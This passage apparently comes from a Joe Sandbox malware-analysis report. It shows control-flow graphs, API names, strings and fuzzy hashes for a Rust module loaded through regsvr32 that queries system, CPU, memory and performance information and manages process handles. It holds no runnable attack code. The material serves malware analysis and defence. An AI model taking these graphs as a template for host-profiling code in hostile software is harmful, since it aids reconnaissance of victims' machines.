2573->2579 2587 7ffb98ffd678-7ffb98ffd683 2574->2587 2588 7ffb98ffd625-7ffb98ffd631 2574->2588 2590 7ffb98ffdb5b 2576->2590 2581 7ffb98ffd606-7ffb98ffd60c 2579->2581 2582 7ffb98ffd655-7ffb98ffd658 2579->2582 2581->2574 2581->2579 2582->2576 2589 7ffb98ffd65e-7ffb98ffd676 call 7ffb990df920 2582->2589 2587->2557 2598 7ffb98ffd689-7ffb98ffd694 2587->2598 2595 7ffb98ffd709-7ffb98ffd710 2588->2595 2596 7ffb98ffd637-7ffb98ffd650 2588->2596 2589->2587 2589->2588 2599 7ffb98ffdb5d-7ffb98ffdb63 call 7ffb990cc040 2590->2599 2600 7ffb98ffd558-7ffb98ffd560 2591->2600 2601 7ffb98ffd548-7ffb98ffd553 call 7ffb98ffc910 2591->2601 2592->2590 2593 7ffb98ffd6d4-7ffb98ffd6dc 2592->2593 2603 7ffb98ffd6e2-7ffb98ffd6fb call 7ffb98ffc900 2593->2603 2604 7ffb98ffdacd 2593->2604 2607 7ffb98ffd716-7ffb98ffd72b call 7ffb98ffc900 2595->2607 2596->2607 2609 7ffb98ffd69a-7ffb98ffd6b5 call 7ffb98ffc900 2598->2609 2610 7ffb98ffd7ce 2598->2610 2612 7ffb98ffdb68-7ffb98ffdb98 call 7ffb990df620 call 7ffb98ffd2b0 2599->2612 2600->2537 2605 7ffb98ffd562-7ffb98ffd571 call 7ffb98ffc910 2600->2605 2601->2600 2603->2599 2629 7ffb98ffd701-7ffb98ffd704 2603->2629 2618 7ffb98ffdad3-7ffb98ffdae9 memcpy 2604->2618 2605->2537 2607->2566 2633 7ffb98ffd731-7ffb98ffd74a memcpy 2607->2633 2609->2560 2635 7ffb98ffd6bb-7ffb98ffd6be 2609->2635 2616 7ffb98ffd7d3-7ffb98ffd7ec memcpy 2610->2616 2623 7ffb98ffd7f2 2616->2623 2624 7ffb98ffd74c-7ffb98ffd757 call 7ffb98ffc910 2616->2624 2618->2601 2626 7ffb98ffdaef 2618->2626 2632 7ffb98ffd75c-7ffb98ffd796 2623->2632 2624->2632 2626->2600 2629->2618 2636 7ffb98ffd508 2630->2636 2637 7ffb98ffd4cf-7ffb98ffd4d2 2630->2637 2639 7ffb98ffd470-7ffb98ffd4a7 call 7ffb98ffdc60 * 4 2631->2639 2640 7ffb98ffd7aa-7ffb98ffd7ad 2632->2640 2641 7ffb98ffd798-7ffb98ffd7a8 call 7ffb98ffdd10 2632->2641 2633->2624 2633->2632 2635->2616 2647 7ffb98ffd50a-7ffb98ffd50d 2636->2647 2644 7ffb98ffd4e0-7ffb98ffd4e5 2637->2644 2639->2630 2675 7ffb98ffd4a9-7ffb98ffd4b8 2639->2675 2642 7ffb98ffd7f7 2640->2642 2643 7ffb98ffd7af-7ffb98ffd7c7 call 7ffb98ffc930 2640->2643 2655 7ffb98ffd814-7ffb98ffd830 call 7ffb98ffc900 2641->2655 2654 7ffb98ffd7fc-7ffb98ffd80c 2642->2654 2643->2654 2659 7ffb98ffd7c9 2643->2659 2651 7ffb98ffd4e7-7ffb98ffd4ed 2644->2651 2652 7ffb98ffd50f-7ffb98ffd512 2644->2652 2647->2570 2651->2644 2657 7ffb98ffd4ef 2651->2657 2652->2570 2652->2612 2654->2655 2662 7ffb98ffdaf4-7ffb98ffdafc call 7ffb990cc040 2655->2662 2666 7ffb98ffd836-7ffb98ffd85c 2655->2666 2657->2647 2659->2662 2662->2546 2669 7ffb98ffd9e9-7ffb98ffda1b 2666->2669 2670 7ffb98ffd862-7ffb98ffd886 2666->2670 2672 7ffb98ffda2f-7ffb98ffda47 2669->2672 2673 7ffb98ffda1d-7ffb98ffda2a call 7ffb98ffc910 2669->2673 2671 7ffb98ffd8f4-7ffb98ffd9d4 call 7ffb990cd5a0 call 7ffb990cf8d0 * 2 2670->2671 2694 7ffb98ffd9da-7ffb98ffd9e4 call 7ffb99002ed0 2671->2694 2695 7ffb98ffd890-7ffb98ffd8ee 2671->2695 2678 7ffb98ffda49-7ffb98ffda57 call 7ffb98ffc910 2672->2678 2679 7ffb98ffda5c-7ffb98ffda67 2672->2679 2673->2672 2675->2630 2675->2639 2678->2679 2681 7ffb98ffda69-7ffb98ffda77 call 7ffb98ffc910 2679->2681 2682 7ffb98ffda7c-7ffb98ffda8a call 7ffb990177f0 2679->2682 2681->2682 2690 7ffb98ffda9f-7ffb98ffdab6 2682->2690 2691 7ffb98ffda8c-7ffb98ffda9a call 7ffb98ffc910 2682->2691 2690->2530 2691->2690 2694->2695 2695->2669 2695->2671
                                                                                APIs
                                                                                Strings
                                                                                • unknownARM x64C:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.32.1\src\windows\cpu.rs, xrefs: 00007FFB98FFD709
                                                                                • 0, xrefs: 00007FFB98FFD3F5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$InfoSystem
                                                                                • String ID: 0$unknownARM x64C:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\sysinfo-0.32.1\src\windows\cpu.rs
                                                                                • API String ID: 1915069931-4250957935
                                                                                • Opcode ID: 54a7f814418847904aaa6705f7122f83602348c92790ed802303e772916d8cf7
                                                                                • Instruction ID: e6052116eae0bc371e997ccca8eff434248a1d073ad0da8b9c1e05bb6e50c058
                                                                                • Opcode Fuzzy Hash: 54a7f814418847904aaa6705f7122f83602348c92790ed802303e772916d8cf7
                                                                                • Instruction Fuzzy Hash: 6A22C7B2A0C69181EB70AB25E0403BAA7A0FB85BC4F649535DF8D07B9ADF7DE541C704

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 3885 7ffb99014570-7ffb99014586 3886 7ffb990145b0-7ffb990145cc 3885->3886 3887 7ffb99014588-7ffb9901458e 3885->3887 3890 7ffb990145cf-7ffb990145f1 call 7ffb98ffc900 3886->3890 3888 7ffb99014594-7ffb990145ae 3887->3888 3889 7ffb990147f8-7ffb990147fa 3887->3889 3888->3890 3892 7ffb99014ba8-7ffb99014bbb 3889->3892 3894 7ffb99014bbc-7ffb99014bc6 call 7ffb990cc040 3890->3894 3895 7ffb990145f7-7ffb99014625 3890->3895 3898 7ffb99014bcb-7ffb99014bf0 call 7ffb990cc040 3894->3898 3897 7ffb9901463a-7ffb99014648 3895->3897 3899 7ffb990146b4-7ffb990146d5 call 7ffb990031a0 3897->3899 3900 7ffb9901464a-7ffb9901465f NtQuerySystemInformation 3897->3900 3909 7ffb99014cbc 3898->3909 3910 7ffb99014bf6-7ffb99014c3e call 7ffb990025f0 3898->3910 3899->3900 3903 7ffb99014661-7ffb99014673 call 7ffb99041570 3900->3903 3904 7ffb990146da-7ffb99014707 call 7ffb98ffc900 3900->3904 3913 7ffb990147bf-7ffb990147d1 3903->3913 3914 7ffb99014679-7ffb990146a5 3903->3914 3904->3898 3917 7ffb9901470d-7ffb99014730 3904->3917 3915 7ffb99014cbe-7ffb99014ccf 3909->3915 3926 7ffb99014c41-7ffb99014c57 3910->3926 3920 7ffb990147e0-7ffb990147e8 3913->3920 3921 7ffb990147d3-7ffb990147db call 7ffb99041320 3913->3921 3918 7ffb99014630-7ffb99014635 3914->3918 3919 7ffb990146a7-7ffb990146af call 7ffb99041320 3914->3919 3923 7ffb9901475d-7ffb99014776 3917->3923 3918->3897 3919->3918 3920->3889 3927 7ffb990147ea-7ffb990147f3 call 7ffb98ffc910 3920->3927 3921->3920 3935 7ffb99014755-7ffb9901475b 3923->3935 3936 7ffb99014778-7ffb99014782 3923->3936 3929 7ffb99014c88-7ffb99014c94 3926->3929 3930 7ffb99014c59 3926->3930 3927->3889 3933 7ffb99014cac-7ffb99014cba 3929->3933 3934 7ffb99014c96-7ffb99014ca4 3929->3934 3937 7ffb99014c60-7ffb99014c79 3930->3937 3933->3915 3934->3926 3935->3923 3940 7ffb9901478e-7ffb990147ad 3935->3940 3938 7ffb99014740-7ffb99014750 3936->3938 3939 7ffb99014784-7ffb9901478c call 7ffb99002e00 3936->3939 3941 7ffb99014c7b-7ffb99014c86 3937->3941 3942 7ffb99014ca6-7ffb99014ca9 3937->3942 3938->3935 3939->3938 3944 7ffb990147ff 3940->3944 3945 7ffb990147af-7ffb990147bd call 7ffb98ffd2b0 3940->3945 3941->3929 3941->3937 3942->3933 3946 7ffb99014801-7ffb9901483c call 7ffb99090510 call 7ffb99090540 3944->3946 3945->3946 3954 7ffb9901483e-7ffb99014840 3946->3954 3955 7ffb99014842 3946->3955 3956 7ffb9901484a-7ffb99014911 call 7ffb99017010 3954->3956 3955->3956 3959 7ffb99014b76-7ffb99014b90 call 7ffb990059d0 3956->3959 3960 7ffb99014917-7ffb99014941 3956->3960 3959->3892 3966 7ffb99014b92-7ffb99014ba0 call 7ffb98ffc910 3959->3966 3961 7ffb99014960-7ffb99014973 3960->3961 3961->3959 3963 7ffb99014979-7ffb990149b1 memcpy call 7ffb9900d6e0 3961->3963 3969 7ffb99014950-7ffb9901495a 3963->3969 3970 7ffb990149b3-7ffb990149be 3963->3970 3971 7ffb99014ba5 3966->3971 3969->3959 3969->3961 3972 7ffb990149c0-7ffb990149ce call 7ffb98ffc910 3970->3972 3973 7ffb990149d3-7ffb990149de 3970->3973 3971->3892 3972->3973 3975 7ffb99014a20-7ffb99014a2b 3973->3975 3976 7ffb990149e0-7ffb990149ec 3973->3976 3978 7ffb99014a2d-7ffb99014a3f call 7ffb98ffc910 3975->3978 3979 7ffb99014a44-7ffb99014a4f 3975->3979 3977 7ffb990149f9-7ffb99014a00 3976->3977 3980 7ffb990149f0-7ffb990149f7 3977->3980 3981 7ffb99014a02-7ffb99014a11 call 7ffb98ffc910 3977->3981 3978->3979 3983 7ffb99014a51-7ffb99014a54 3979->3983 3984 7ffb99014a69-7ffb99014a74 3979->3984 3980->3975 3980->3977 3981->3980 3983->3984 3988 7ffb99014a56-7ffb99014a64 call 7ffb98ffc910 3983->3988 3985 7ffb99014a8e-7ffb99014a99 3984->3985 3986 7ffb99014a76-7ffb99014a79 3984->3986 3991 7ffb99014a9b-7ffb99014aa7 3985->3991 3992 7ffb99014ae0-7ffb99014aeb 3985->3992 3986->3985 3990 7ffb99014a7b-7ffb99014a89 call 7ffb98ffc910 3986->3990 3988->3984 3990->3985 3995 7ffb99014ab9-7ffb99014ac0 3991->3995 3996 7ffb99014aed-7ffb99014aff call 7ffb98ffc910 3992->3996 3997 7ffb99014b04-7ffb99014b0f 3992->3997 4000 7ffb99014ab0-7ffb99014ab7 3995->4000 4001 7ffb99014ac2-7ffb99014ad1 call 7ffb98ffc910 3995->4001 3996->3997 3998 7ffb99014b11-7ffb99014b14 3997->3998 3999 7ffb99014b29-7ffb99014b34 3997->3999 3998->3999 4003 7ffb99014b16-7ffb99014b24 call 7ffb98ffc910 3998->4003 4004 7ffb99014b4e-7ffb99014b59 3999->4004 4005 7ffb99014b36-7ffb99014b39 3999->4005 4000->3992 4000->3995 4001->4000 4003->3999 4004->3969 4009 7ffb99014b5f-7ffb99014b63 4004->4009 4005->4004 4008 7ffb99014b3b-7ffb99014b49 call 7ffb98ffc910 4005->4008 4008->4004 4009->3969 4012 7ffb99014b69-7ffb99014b71 call 7ffb9900be90 4009->4012 4012->3969
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: InformationQuerySystem
                                                                                • String ID:
                                                                                • API String ID: 3562636166-0
                                                                                • Opcode ID: 790771e9d2b311173de4575980f628a20167decbdbb59aa7f8e9ea8ed94ff7ad
                                                                                • Instruction ID: 7a1213fcb1a108ae0ded51ca4c609a26f228f36ef22a56d90b2a81107a496bf1
                                                                                • Opcode Fuzzy Hash: 790771e9d2b311173de4575980f628a20167decbdbb59aa7f8e9ea8ed94ff7ad
                                                                                • Instruction Fuzzy Hash: 4A0282B2A1DB8281EBB59F21E0403ABB7A1FB86BC0F548435DA9D47B99DF3DD5448700
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: e5510ef113cd0099712f7f3f172633a19891afc883e0d682ac8346d33fa30402
                                                                                • Instruction ID: 9e5cb78e30f246e1343527c88457694bab62a54aadd75befb54a76cd840b5492
                                                                                • Opcode Fuzzy Hash: e5510ef113cd0099712f7f3f172633a19891afc883e0d682ac8346d33fa30402
                                                                                • Instruction Fuzzy Hash: FAE01221A649E2D9FA16DFB8D8465F463716F90359B440611E94E16154AE38D3D1C604

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 1777 7ffb9908e2b0-7ffb9908e2fb call 7ffb9909d3c0 1780 7ffb9908e4bf-7ffb9908e4c6 1777->1780 1781 7ffb9908e301-7ffb9908e330 1777->1781 1782 7ffb9908e4e7-7ffb9908e4fd 1780->1782 1783 7ffb9908e337-7ffb9908e387 1781->1783 1784 7ffb9908e332 CloseHandle 1781->1784 1785 7ffb9908e3d6-7ffb9908e3d8 1783->1785 1786 7ffb9908e389-7ffb9908e38b 1783->1786 1784->1783 1789 7ffb9908e419-7ffb9908e428 WaitForSingleObject 1785->1789 1790 7ffb9908e3da-7ffb9908e3ed call 7ffb99098ff0 1785->1790 1787 7ffb9908e3f8-7ffb9908e40b call 7ffb99098ff0 1786->1787 1788 7ffb9908e38d-7ffb9908e39b call 7ffb9909c3b0 1786->1788 1802 7ffb9908e52c-7ffb9908e553 call 7ffb990d9260 1787->1802 1803 7ffb9908e411 1787->1803 1796 7ffb9908e3a0-7ffb9908e3a3 1788->1796 1792 7ffb9908e42a-7ffb9908e439 GetLastError 1789->1792 1793 7ffb9908e46f-7ffb9908e47d call 7ffb990ef6cc 1789->1793 1809 7ffb9908e3f3-7ffb9908e3f6 1790->1809 1810 7ffb9908e4fe-7ffb9908e52a call 7ffb990d9260 1790->1810 1797 7ffb9908e44a-7ffb9908e455 1792->1797 1798 7ffb9908e43b-7ffb9908e445 call 7ffb98ffc910 1792->1798 1808 7ffb9908e482-7ffb9908e484 1793->1808 1796->1789 1804 7ffb9908e3a5-7ffb9908e3d1 call 7ffb990d9260 1796->1804 1806 7ffb9908e466-7ffb9908e46d 1797->1806 1807 7ffb9908e457-7ffb9908e461 call 7ffb98ffc910 1797->1807 1798->1797 1820 7ffb9908e558-7ffb9908e5ba call 7ffb99059d70 CloseHandle 1802->1820 1811 7ffb9908e414 CloseHandle 1803->1811 1804->1820 1816 7ffb9908e4a6-7ffb9908e4ba CloseHandle * 2 1806->1816 1807->1806 1808->1792 1817 7ffb9908e486-7ffb9908e4a2 1808->1817 1809->1811 1810->1820 1811->1789 1821 7ffb9908e4c8-7ffb9908e4e3 1816->1821 1822 7ffb9908e4bc 1816->1822 1817->1816 1827 7ffb9908e5cb-7ffb9908e5d2 1820->1827 1828 7ffb9908e5bc-7ffb9908e5c6 call 7ffb98ffc910 1820->1828 1821->1782 1822->1780 1829 7ffb9908e5e3-7ffb9908e64b call 7ffb9905a610 CloseHandle * 2 call 7ffb990efde0 call 7ffb9909d3c0 1827->1829 1830 7ffb9908e5d4-7ffb9908e5de call 7ffb98ffc910 1827->1830 1828->1827 1839 7ffb9908e65c-7ffb9908e673 1829->1839 1840 7ffb9908e64d-7ffb9908e657 1829->1840 1830->1829 1842 7ffb9908e675-7ffb9908e679 CloseHandle 1839->1842 1843 7ffb9908e67e-7ffb9908e68d WaitForSingleObject 1839->1843 1841 7ffb9908e6f4-7ffb9908e707 1840->1841 1842->1843 1844 7ffb9908e6a7-7ffb9908e6bc GetExitCodeProcess 1843->1844 1845 7ffb9908e68f-7ffb9908e6a5 GetLastError 1843->1845 1844->1845 1847 7ffb9908e6be-7ffb9908e6c4 1844->1847 1846 7ffb9908e6c6-7ffb9908e6dc CloseHandle * 2 1845->1846 1848 7ffb9908e6e6-7ffb9908e6ea 1846->1848 1849 7ffb9908e6de-7ffb9908e6e1 CloseHandle 1846->1849 1847->1846 1848->1841 1850 7ffb9908e6ec-7ffb9908e6ef CloseHandle 1848->1850 1849->1848 1850->1841
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle$ErrorLastObjectSingleWait
                                                                                • String ID: called `Result::unwrap()` on an `Err` value
                                                                                • API String ID: 1454876536-2333694755
                                                                                • Opcode ID: 4622f5ef01afa671e17d50ea80cab3d94a0515aa6262abb91f1b43ba50a09c45
                                                                                • Instruction ID: a0fde5dc8c699ecd303915f12ba0f28a92c49306daca16e66c0d63eef35fbf8e
                                                                                • Opcode Fuzzy Hash: 4622f5ef01afa671e17d50ea80cab3d94a0515aa6262abb91f1b43ba50a09c45
                                                                                • Instruction Fuzzy Hash: DAC15BB2B08A9399EB60AF76D8403EC3B60BB54798F144031EE6D57B99DF39E585C340

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$GlobalInfoMemoryPerformanceStatus
                                                                                • String ID: @$cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs
                                                                                • API String ID: 4293763300-1373735107
                                                                                • Opcode ID: e28a955019ed786fc4b7ea111ed4ac73c7eae90f47c405532ad5512a77d2755e
                                                                                • Instruction ID: 59dde133c6bf96c61a226830b5c89ff7cad9672f194bd29b00edc5c1b1926f11
                                                                                • Opcode Fuzzy Hash: e28a955019ed786fc4b7ea111ed4ac73c7eae90f47c405532ad5512a77d2755e
                                                                                • Instruction Fuzzy Hash: 6B918E62A18BC681F7B18B24E4027FAA360FBD6744F009325EADD02B95EF7DD185CB40

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2738 7ffb9909c3b0-7ffb9909c3e8 call 7ffb9909c650 2741 7ffb9909c3f7-7ffb9909c42a call 7ffb9909c650 2738->2741 2742 7ffb9909c3ea-7ffb9909c3f2 CloseHandle 2738->2742 2746 7ffb9909c430-7ffb9909c468 2741->2746 2747 7ffb9909c5f1-7ffb9909c5f5 call 7ffb9905a540 2741->2747 2743 7ffb9909c5fa-7ffb9909c60c 2742->2743 2748 7ffb9909c470-7ffb9909c489 call 7ffb990ef95c 2746->2748 2747->2743 2752 7ffb9909c48b-7ffb9909c48d 2748->2752 2753 7ffb9909c4d0-7ffb9909c4d7 2748->2753 2754 7ffb9909c493-7ffb9909c49a 2752->2754 2755 7ffb9909c5d8-7ffb9909c5dd GetLastError 2752->2755 2756 7ffb9909c5a5-7ffb9909c5ab call 7ffb9909c730 2753->2756 2757 7ffb9909c4dd-7ffb9909c4e0 2753->2757 2758 7ffb9909c52e-7ffb9909c534 call 7ffb9909c730 2754->2758 2759 7ffb9909c4a0-7ffb9909c4a3 2754->2759 2760 7ffb9909c5e0-7ffb9909c5e4 2755->2760 2771 7ffb9909c5b0-7ffb9909c5b4 2756->2771 2761 7ffb9909c4eb-7ffb9909c50a GetOverlappedResult 2757->2761 2762 7ffb9909c4e2-7ffb9909c4e6 2757->2762 2774 7ffb9909c539-7ffb9909c53d 2758->2774 2765 7ffb9909c4a5-7ffb9909c4c4 GetOverlappedResult 2759->2765 2766 7ffb9909c511 2759->2766 2767 7ffb9909c5e8-7ffb9909c5ec call 7ffb9905a540 2760->2767 2769 7ffb9909c569-7ffb9909c571 GetLastError 2761->2769 2770 7ffb9909c50c-7ffb9909c50f 2761->2770 2768 7ffb9909c590-7ffb9909c5a3 2762->2768 2775 7ffb9909c4ca-7ffb9909c4cd 2765->2775 2776 7ffb9909c54f-7ffb9909c557 GetLastError 2765->2776 2781 7ffb9909c515-7ffb9909c528 2766->2781 2767->2747 2768->2756 2780 7ffb9909c5cb-7ffb9909c5d6 call 7ffb9909c840 2768->2780 2777 7ffb9909c573-7ffb9909c57f 2769->2777 2778 7ffb9909c587-7ffb9909c589 2769->2778 2770->2768 2772 7ffb9909c5b6-7ffb9909c5ba 2771->2772 2773 7ffb9909c5c2-7ffb9909c5c6 2771->2773 2772->2748 2782 7ffb9909c5c0 2772->2782 2773->2767 2774->2773 2783 7ffb9909c543-7ffb9909c547 2774->2783 2775->2781 2784 7ffb9909c583-7ffb9909c585 2776->2784 2785 7ffb9909c559-7ffb9909c565 2776->2785 2777->2768 2787 7ffb9909c581 2777->2787 2778->2768 2780->2767 2781->2758 2788 7ffb9909c5c8 2781->2788 2782->2780 2783->2748 2789 7ffb9909c54d 2783->2789 2784->2781 2785->2781 2790 7ffb9909c567 2785->2790 2787->2760 2788->2780 2789->2788 2790->2760
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: CloseCreateEventHandleOverlappedResult
                                                                                • String ID:
                                                                                • API String ID: 3756958029-0
                                                                                • Opcode ID: 355faade7bac29bcd4c5ebe2af3383654b138340226fca9017914fac89a0fe6c
                                                                                • Instruction ID: 9887e50e3daf20a4e7d46fc723f2474cd0b4028ad4c7cfe9299d9c0ae823db86
                                                                                • Opcode Fuzzy Hash: 355faade7bac29bcd4c5ebe2af3383654b138340226fca9017914fac89a0fe6c
                                                                                • Instruction Fuzzy Hash: 966180A2F0866389FBB08F75C4413BC2BA0AB15798F544435EE5D9BB86DF39E5C58380

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 2792 7ffb99013e20-7ffb99013e50 2793 7ffb99013e56-7ffb99013e68 PdhCollectQueryData 2792->2793 2794 7ffb99013f98-7ffb99013fb6 PdhOpenQueryA 2792->2794 2797 7ffb99013e8f-7ffb99013ea0 call 7ffb98ffd2b0 2793->2797 2798 7ffb99013e6a-7ffb99013e78 call 7ffb98ffcf80 2793->2798 2795 7ffb99013fc4-7ffb99013fdb call 7ffb9902f3b0 call 7ffb98ffc950 2794->2795 2796 7ffb99013fb8-7ffb99013fbd 2794->2796 2828 7ffb9901434b-7ffb9901436f call 7ffb990d9260 2795->2828 2830 7ffb99013fe1-7ffb99013ff3 2795->2830 2799 7ffb99013fbf 2796->2799 2800 7ffb99013ff9-7ffb9901400b call 7ffb98ffcde0 2796->2800 2810 7ffb99013ea2-7ffb99013ec0 2797->2810 2811 7ffb99013f13-7ffb99013f16 2797->2811 2815 7ffb99013e7e-7ffb99013e8a 2798->2815 2816 7ffb99014333-7ffb99014346 call 7ffb990d8b30 2798->2816 2806 7ffb99014100-7ffb9901413a 2799->2806 2800->2806 2817 7ffb99014011-7ffb99014039 2800->2817 2812 7ffb9901413c-7ffb99014157 2806->2812 2813 7ffb99014158-7ffb99014174 call 7ffb98ffc900 2806->2813 2818 7ffb99013ee7-7ffb99013eea 2810->2818 2811->2812 2821 7ffb99013f1c-7ffb99013f20 2811->2821 2832 7ffb99014374-7ffb9901437e call 7ffb990cc040 2813->2832 2833 7ffb9901417a-7ffb990141be call 7ffb98ffc900 2813->2833 2815->2797 2816->2828 2823 7ffb9901403b-7ffb9901404d 2817->2823 2824 7ffb990140b6-7ffb990140e2 2817->2824 2826 